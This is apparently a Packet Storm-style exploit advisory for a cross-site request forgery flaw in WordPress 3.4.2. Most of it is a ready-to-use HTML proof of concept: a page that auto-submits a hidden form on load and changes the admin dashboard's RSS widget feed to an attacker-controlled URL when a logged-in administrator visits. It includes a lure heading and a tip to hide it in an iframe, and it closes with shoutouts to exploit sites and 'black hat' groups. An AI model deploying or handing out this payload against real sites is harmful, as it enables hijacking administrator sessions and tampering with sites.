WordPress 3.4.2 Cross Site Request Forgery

`============================================================  
Vulnerable Software: WordPress (Version 3.4.2)  
Downloaded from: http://wordpress.org/latest.zip  
MD5SUM: (d670508d81e2fd060c2041441bc03300 *wordpress-3.4.2.zip)  
===========================================================  
  
Tested:  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
MYSQL: 5.5.27  
  
===========================================================  
Vuln Desc: WordPress Version 3.4.2 is vulnerable to Cross Site Request Forgery Vulnerability.  
The folloging CSRF exploit will change rss link if the currently logged administrator visits malicious page which containts the exploit below.  
============================================================  
Proof Of Concept  
  
==================WORDPRESS 3.4.2 CSRF exploit=================  
<body onload="javascript:document.forms[0].submit()">  
<form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post" class="dashboard-widget-control-form">  
<h1>How Many Girls You Have? xD))</h1>  
<!-- Idea for you: Iframe it -->  
<input name="widget-rss[1][url]" type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php" />  
  
<select id="rss-items-1" name="widget-rss[1][items]">  
<option value='1' >1</option>  
<option value='2' >2</option>  
<option value='3' >3</option><option value='4' >4</option>  
<option value='5' >5</option>  
<option value='6' >6</option>  
<option value='7' >7</option>  
<option value='8' >8</option>  
<option value='9' >9</option>  
<option value='10' >10</option>  
<option value='11' >11</option>  
<option value='12' >12</option>  
<option value='13' >13</option>  
<option value='14' >14</option>  
<option value='15' >15</option>  
<option value='16' >16</option>  
<option value='17' >17</option>  
<option value='18' >18</option>  
<option value='19' >19</option>  
<option value='20' selected='selected'>20</option>  
</select>  
<input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/>  
<input type="hidden" name="widget_id" value="dashboard_incoming_links" />  
</form>  
====================END OF=================================  
  
  
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:  
===========================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
to all Aa Team + to all Azerbaijan Black HatZ +  
*Especially to my bro CAMOUFL4G3.*  
===========================================================  
  
/AkaStep  
`